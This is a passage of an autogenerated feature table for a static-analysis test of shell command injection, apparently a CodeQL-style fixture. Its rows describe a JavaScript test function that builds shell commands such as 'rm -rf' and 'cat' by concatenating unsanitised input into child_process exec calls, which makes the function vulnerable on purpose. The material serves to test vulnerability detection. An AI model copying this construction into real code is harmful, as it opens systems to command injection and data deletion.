name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | exceptional return of cp.exec ... + "'") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | exceptional return of cp.exec ... + "'") | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | exceptional return of cp.exec ... + "'") | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | exceptional return of cp.exec ... + "'") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:5:75:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:5:75:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:5:75:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:5:75:8 | exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:5:75:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:16 | "cat '" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:16 | "cat '" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:16 | "cat '" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:16 | "cat '" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:16 | "cat '" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:16 | "cat '" | stringConcatenatedWith | -endpoint- name + ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:23 | "cat '" + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:23 | "cat '" + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:23 | "cat '" + name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:23 | "cat '" + name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:23 | "cat '" + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:29 | "cat '" + name + "'" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:29 | "cat '" + name + "'" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:29 | "cat '" + name + "'" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:29 | "cat '" + name + "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:29 | "cat '" + name + "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:29 | "cat '" + name + "'" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:29 | "cat '" + name + "'" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:29 | "cat '" + name + "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:10:75:29 | "cat '" + name + "'" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:20:75:23 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:20:75:23 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:20:75:23 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:20:75:23 | name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:20:75:23 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:20:75:23 | name | stringConcatenatedWith | 'cat '' -endpoint- ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:27:75:29 | "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:27:75:29 | "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:27:75:29 | "'" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:27:75:29 | "'" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:27:75:29 | "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:27:75:29 | "'" | stringConcatenatedWith | 'cat '' + name -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:3 | cp | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:8 | cp.exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | cp.exec ... + "'") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | cp.exec ... + "'") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | cp.exec ... + "'") | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | cp.exec ... + "'") | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | cp.exec ... + "'") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | exceptional return of cp.exec ... + "'") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | exceptional return of cp.exec ... + "'") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | exceptional return of cp.exec ... + "'") | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | exceptional return of cp.exec ... + "'") | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | exceptional return of cp.exec ... + "'") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:5:77:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:5:77:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:5:77:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:5:77:8 | exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:5:77:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:24 | "cat '/foo/bar" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:24 | "cat '/foo/bar" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:24 | "cat '/foo/bar" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:24 | "cat '/foo/bar" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:24 | "cat '/foo/bar" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:24 | "cat '/foo/bar" | stringConcatenatedWith | -endpoint- name + ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:31 | "cat '/ ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| 